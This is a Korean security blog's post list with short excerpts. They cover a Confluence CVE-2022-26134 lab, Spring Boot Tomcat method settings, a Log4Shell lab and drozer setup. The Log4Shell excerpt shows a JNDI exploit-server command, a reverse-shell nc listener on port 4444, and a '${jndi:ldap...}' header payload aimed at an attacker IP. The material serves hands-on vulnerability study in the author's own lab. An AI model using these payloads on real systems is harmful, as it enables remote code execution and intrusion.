목록전체 글 (276)
의미없는 블로그
환경구축 : https://github.com/vulhub/vulhub/tree/master/confluence/CVE-2022-26134 PoC : https://github.com/h3v0x/CVE-2022-26134/blob/main/exploit.py docker-compose 명령어 설치해서(https://saltlee.tistory.com/76) docker-compose.yml 파일로 환경구축(버전 7.13.6) 컨테이너 띄운다음에 Confluence Datacenter 로 했고 DB만 저기 내용대로 설정했다 테스트는 버프로 해도 되고 python 으로 날려도 되고 https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis..
보호되어 있는 글입니다.
이클립스에서 스프링 프로젝트 만들고 로컬에 다운받은 톰캣으로 구동시키는 경우 있고 내장된 임베디드 톰캣으로 구동시키는 경우 있다 내장된 임베디드 톰캣 쓰면 conf/web.xml, con/server.xml 등 없기 때문에 (임베디드 톰캣은 걍 jar 파일로 되어있는듯) 메소드 조치할 때 java 코드로 설정해줘야 함 1. 이클립스에서 스프링부트 플젝 만들기 https://jung-max.github.io/2020/06/24/Web-2_SpringBoot%ED%94%84%EB%A1%9C%EC%A0%9D%ED%8A%B8%EC%83%9D%EC%84%B1/ > 요기보고 똑같이 따라함 > Spring Starter Project 로 만들면 됨 > Hello World 까지는 안띄워도 됨 > 난 Spring Bo..
[Victim 서버 구축(도커)] https://github.com/christophetd/log4shell-vulnerable-app [공격자(칼리)] 아래 exploit 다운받고 자바는 1.8 이어야 함.. java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "victim 에서 실행할 명령어" -A "공격자 IP" 이거 보내면 Vicim의 JDK 버전에 따라 무슨 페이로드 보낼건지 뜨는데 Victim이 JDK1.8 이라고 한다 그래서 저기 빨간 네모박스 페이로드 보낼거임.. Victim 에다가 nc 4444 보냈으니깐 4444 포트로 리스닝 대기 Victim 에다가 HTTP 요청 보내는데 X-Api-Version: ${jndi:ldap//192.168..
보호되어 있는 글입니다.
보호되어 있는 글입니다.
https://labs.withsecure.com/tools/drozer PC는 drozer.msi 설치하고 폰은 drozer.apk 설치해야 댐 폰에서 drozer agent ON 하고